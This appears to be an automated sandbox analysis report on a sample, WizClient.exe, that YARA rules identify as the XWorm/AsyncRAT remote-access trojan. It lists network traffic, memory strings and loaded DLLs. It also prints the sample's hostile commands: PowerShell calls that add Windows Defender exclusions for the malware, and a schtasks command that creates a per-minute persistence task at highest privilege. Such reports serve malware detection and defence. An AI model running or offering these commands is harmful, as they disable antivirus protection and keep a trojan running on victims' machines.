            Source: WizClient.exe, 00000003.00000002.2561891365.000000000249C000.00000004.00000800.00020000.00000000.sdmp, WizClient.exe, 00000003.00000002.2561891365.00000000024CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://i.ibb.co
            Source: WizClient.exe, 00000003.00000002.2561891365.0000000002566000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://i.ibb.co(
            Source: WizClient.exe, WizClient.exe.3.drString found in binary or memory: https://i.ibb.co/Dwrj41N/Image.png
            Source: powershell.exe, 00000005.00000002.1379923372.000001F96D949000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1528597758.0000016111768000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1717800931.0000020C90076000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 108.181.22.211:443 -> 192.168.2.5:49719 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 108.181.22.211:443 -> 192.168.2.5:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 108.181.22.211:443 -> 192.168.2.5:49723 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 91.134.10.168:443 -> 192.168.2.5:49725 version: TLS 1.2

            Operating System Destruction

            barindex
            Protects its processes via BreakOnTermination flag
            Source: C:\Users\user\Desktop\WizClient.exeProcess information set: 01 00 00 00 Jump to behavior

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: WizClient.exe, type: SAMPLEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: WizClient.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 3.0.WizClient.exe.230000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 3.0.WizClient.exe.230000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000003.00000000.1277877176.0000000000232000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\WizClient.exe, type: DROPPEDMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: C:\Users\user\AppData\Local\WizClient.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C677F13_2_00007FF7C7C677F1
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C612C83_2_00007FF7C7C612C8
            Source: C:\Users\user\Desktop\WizClient.exeCode function: 3_2_00007FF7C7C685A13_2_00007FF7C7C685A1
            Source: C:\Users\user\AppData\Local\WizClient.exeCode function: 17_2_00007FF7C7C612C817_2_00007FF7C7C612C8
            Source: C:\Users\user\AppData\Local\WizClient.exeCode function: 20_2_00007FF7C7C612C820_2_00007FF7C7C612C8
            Source: C:\Users\user\AppData\Local\WizClient.exeCode function: 21_2_00007FF7C7C712CC21_2_00007FF7C7C712CC
            Source: C:\Users\user\AppData\Local\WizClient.exeCode function: 24_2_00007FF7C7C612C824_2_00007FF7C7C612C8
            Source: WizClient.exe, 00000011.00000002.1894801680.000000000063C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs WizClient.exe
            Source: WizClient.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: WizClient.exe, type: SAMPLEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: WizClient.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 3.0.WizClient.exe.230000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 3.0.WizClient.exe.230000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000003.00000000.1277877176.0000000000232000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\WizClient.exe, type: DROPPEDMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: C:\Users\user\AppData\Local\WizClient.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: WizClient.exe, MNnxWzFHJ2Ct5plUS0TNIf6CaXhblonCfU6C8N8NjeADq3IH21Ggp5wQZS.csCryptographic APIs: 'TransformFinalBlock'
            Source: WizClient.exe, SWnjqHSOHIHFr4WnpEsMxJbTMM3nl233qOGFtEUGrNNAcbuz7qZJv25QLZ.csCryptographic APIs: 'TransformFinalBlock'
            Source: WizClient.exe, SWnjqHSOHIHFr4WnpEsMxJbTMM3nl233qOGFtEUGrNNAcbuz7qZJv25QLZ.csCryptographic APIs: 'TransformFinalBlock'
            Source: WizClient.exe.3.dr, MNnxWzFHJ2Ct5plUS0TNIf6CaXhblonCfU6C8N8NjeADq3IH21Ggp5wQZS.csCryptographic APIs: 'TransformFinalBlock'
            Source: WizClient.exe.3.dr, SWnjqHSOHIHFr4WnpEsMxJbTMM3nl233qOGFtEUGrNNAcbuz7qZJv25QLZ.csCryptographic APIs: 'TransformFinalBlock'
            Source: WizClient.exe.3.dr, SWnjqHSOHIHFr4WnpEsMxJbTMM3nl233qOGFtEUGrNNAcbuz7qZJv25QLZ.csCryptographic APIs: 'TransformFinalBlock'
            Source: WizClient.exe, RbAyA3NkD73ndjqtSc3P2WGRUy4z3JhkJuFsryUZXwwnhEEVivpZEtp0sNa6yGwI8IIDaFDXb8QQoc2GSnKL.csBase64 encoded string: 'OWQ7Md1p4cFUvNP5mNCLTLsEzhZ3pyhxj9V135KsRqx+frmKHn5aiEQva6l5LbWB'
            Source: WizClient.exe.3.dr, RbAyA3NkD73ndjqtSc3P2WGRUy4z3JhkJuFsryUZXwwnhEEVivpZEtp0sNa6yGwI8IIDaFDXb8QQoc2GSnKL.csBase64 encoded string: 'OWQ7Md1p4cFUvNP5mNCLTLsEzhZ3pyhxj9V135KsRqx+frmKHn5aiEQva6l5LbWB'
            Source: WizClient.exe, shmYJX63MoDoDf0kg7JYt6GmNt.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: WizClient.exe, shmYJX63MoDoDf0kg7JYt6GmNt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: WizClient.exe.3.dr, shmYJX63MoDoDf0kg7JYt6GmNt.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: WizClient.exe.3.dr, shmYJX63MoDoDf0kg7JYt6GmNt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winEXE@17/17@4/4
            Source: C:\Users\user\Desktop\WizClient.exeFile created: C:\Users\user\AppData\Local\WizClient.exeJump to behavior
            Source: C:\Users\user\AppData\Local\WizClient.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8880:120:WilError_03
            Source: C:\Users\user\Desktop\WizClient.exeMutant created: \Sessions\1\BaseNamedObjects\mRO7rAhCPkjSQfd4
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8200:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9120:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8428:120:WilError_03
            Source: C:\Users\user\Desktop\WizClient.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
            Source: WizClient.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: WizClient.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\WizClient.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: WizClient.exeVirustotal: Detection: 69%
            Source: WizClient.exeReversingLabs: Detection: 71%
            Source: C:\Users\user\Desktop\WizClient.exeFile read: C:\Users\user\Desktop\WizClient.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\WizClient.exe "C:\Users\user\Desktop\WizClient.exe"
            Source: C:\Users\user\Desktop\WizClient.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\WizClient.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WizClient.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\WizClient.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WizClient.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\WizClient.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WizClient" /tr "C:\Users\user\AppData\Local\WizClient.exe"
            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Local\WizClient.exe C:\Users\user\AppData\Local\WizClient.exe
            Source: unknownProcess created: C:\Users\user\AppData\Local\WizClient.exe "C:\Users\user\AppData\Local\WizClient.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Local\WizClient.exe "C:\Users\user\AppData\Local\WizClient.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Local\WizClient.exe C:\Users\user\AppData\Local\WizClient.exe
            Source: C:\Users\user\Desktop\WizClient.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe'Jump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WizClient.exe'Jump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WizClient.exe'Jump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WizClient" /tr "C:\Users\user\AppData\Local\WizClient.exe"Jump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Users\user\Desktop\WizClient.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
